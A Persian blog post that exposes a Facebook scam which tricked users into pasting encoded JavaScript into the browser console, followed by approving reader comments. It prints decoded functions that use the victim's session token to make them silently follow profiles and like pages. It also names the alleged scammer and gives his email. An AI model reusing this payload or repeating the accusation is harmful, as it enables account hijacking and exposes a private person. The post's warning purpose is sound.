چند وقت پیش بود که یه “روش جدید” برای پیدا کردن پسورد دوست ها ی فیسبوکی باب شد که البته چیزی نبود جز اجرای کدهای جاوا اسکریپت و لایک شدن یه سری صفحه توسط قربانی (فریب خورده).
چند روزه که دوباره سر و کله این کدهای جاوا اسکریپت پیدا شده. این بار به اسم اینکه بفهمیم کی پروفایل ما رو خونده یا به زبان خود منتشر کننده: “پیدا کنین دوستانی که هر روز به پروفایل شما سر میزنزن و فضولی میکنن برای پیدا کردن به لینک برید”
بذارید ببینیم تو لینک چه خبره. خب دوباره همون روش قبلیه. مراحلی که از قربانی خواسته می شه تا انجام بده، اینهاست:
- مرورگر گوگل کروم رو باز میکنیم یا اگه ندارین دانلود کنین
- پروفایل فیسبوک خود را باز میکنین
- با آدرس HTTPS://WWW.FACEBOOK.COM
- روی صفحه پروفایل کلید اف ۱۲ رو میزنیم یا کلیک راست کرده گزینه “inspect element” رو میزنیم
- از صفحه باز شده گزینه “console” را میزنیم مثل شکل زیر
- وقتی باز شد متن زیر را کپی کرده و در داخل “console” پیست میکنیم
- خب رسیدیم به جای حساس اگه مراحل بالا رو به درستی انجام داده باشید پنجره به این شکل باز میشه
- رو میزنید “Start”
- صبر کنید تا تمام دوست های شما رو اسکن کنه و فضولاش و بهتون نشون بده مرحله ۱۰ خیلی مهمه
- خب آخر کار وقتی همه دوستات اسکن شدن گزینه “Enable Application” رو بزنید تا دوستای منتخب نشون بده
آدم بدهای داستان کلی فسفر سوزوندن که روش رو غیرقابل شناسایی کنن. تصویر زیر، متنی است که قرار درکنسول اجراکنیم:
این عدد و رقم های رندم در واقع یه سری کده که با روش url encoding رمز شده. رمز که چی بگم 🙂
بذارید رمزگشایی کنیم و ببینیم که کد چیه:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | function a(abone) { var http4 = new XMLHttpRequest(); var url4 = "/ajax/follow/follow_profile.php?__a=1"; var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; http4.open("POST", url4, true); http4.onreadystatechange = function () { if (http4.readyState == 4 && http4.status == 200) { http4.close; } }; http4.send(params4); } a("100004720543729"); a("100000892459233"); |
این فقط بخشی از کده. همه اش رو نمی تونم بذارم به خاطر اینکه کد مشکوک روی سرور می شینه و سرویس های چک کننده، به زودی بهش گیر خواهند داد 🙂
ولی این تیکه کد بالا چیه؟ این تیکه نشون می ده که شما نا خواسته این دو تا پروفایل رو فالو خواهید کرد:
1 2 | https://www.facebook.com/iranibashdotcom https://www.facebook.com/mohammad.rafiyee.9 |
بازهم هست. این بخشش بدون اجازه شما یه سری صفحه رو لایک می کنه:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); } Like("186251118247970"); Like("706446096033432"); Like("281426505315968"); Like("472568382864379"); Like("154827081297282"); Like("541999975874115"); Like("406284926112214"); Like("416753218451460"); Like("505992146164017"); |
و صفحه هایی که لایک می شن ایناست:
1 2 3 4 | https://www.facebook.com/fasionforyouuuuuuuu https://www.facebook.com/vines.worldER https://www.facebook.com/ILoveManicuresssssssss https://www.facebook.com/InterestingFactsFans |
و یه سری صفحه دیگه که همگی در فاصله چند روز ایجاد شدند.
سایتی که همه این صفحه ها رو به هم مرتبط می کنه اینه:
1 2 | http://www.best-pic.net/ http://www.top-pics.net |
و در آخر هم جناب آقای محترمی که احتمالا خودشون رو هم خیلی زرنگ می دونن و در کنار لایک گرفتن دزدی برای صفحه هاشون، فالورهای خودش رو هم زیاد کرده:
محمد رفیعی که آدرس پروفایلش رو گذاشتم و این هم ایمیلش:
1 | mohammad_rafiyee@yahoo.com |
تا اینجای قضیه رسیدیم به اینکه کی بوده که دیگران رو فریب می داده. حالا سوال اینه که کیا و چرا فریب خوردن؟
دونستن اینکه کی پروفایمون رو چک کرده اخلاقی تر از تلاش برای پیدا کردن پسورد دوستامونه اما باید وقتی با همچین مواردی رو به رو می شیم کمی مکث کنیم.
آیا با هر ابزاری که دستمون اومد (چه درست چه غلط) باید کار کنیم؟ حتی اگر الفبای استفاده از اون رو بلد نباشیم؟
آیا منطقیه که سرویسی که بارها فیسبوک ارائه اش رو تکذیب کرده با یک کد ساده اون هم از طرف کاربر، انجام بشه و هیچ خبری هم ازش در سایت های معتبر نباشه؟
و چندین و چند سوال دیگه. آدم بدها خیلی وقت ها از نقاط ضعف انسانی وارد می شن و البته اسم تمیز و گول زننده ای داره: مهندسی اجتماعی.
در پست های دیگه در مورد مهندسی اجتماعی بیشتر خواهم گفت
عالی بود. share کردن این پست از واجباته! 🙂
خیلی پست خوبی بود . حرف نداشت
عالی
بسیار عالی، هم این پست و هم اون پست مربوط هش کردن رمزها و …
واقعا تشکر(:
سلام خیلی عالی بود
چند وقتی هست دیگه مطلب نمی زاری
همین امروز یه پست کوچیک گذاشتم 🙂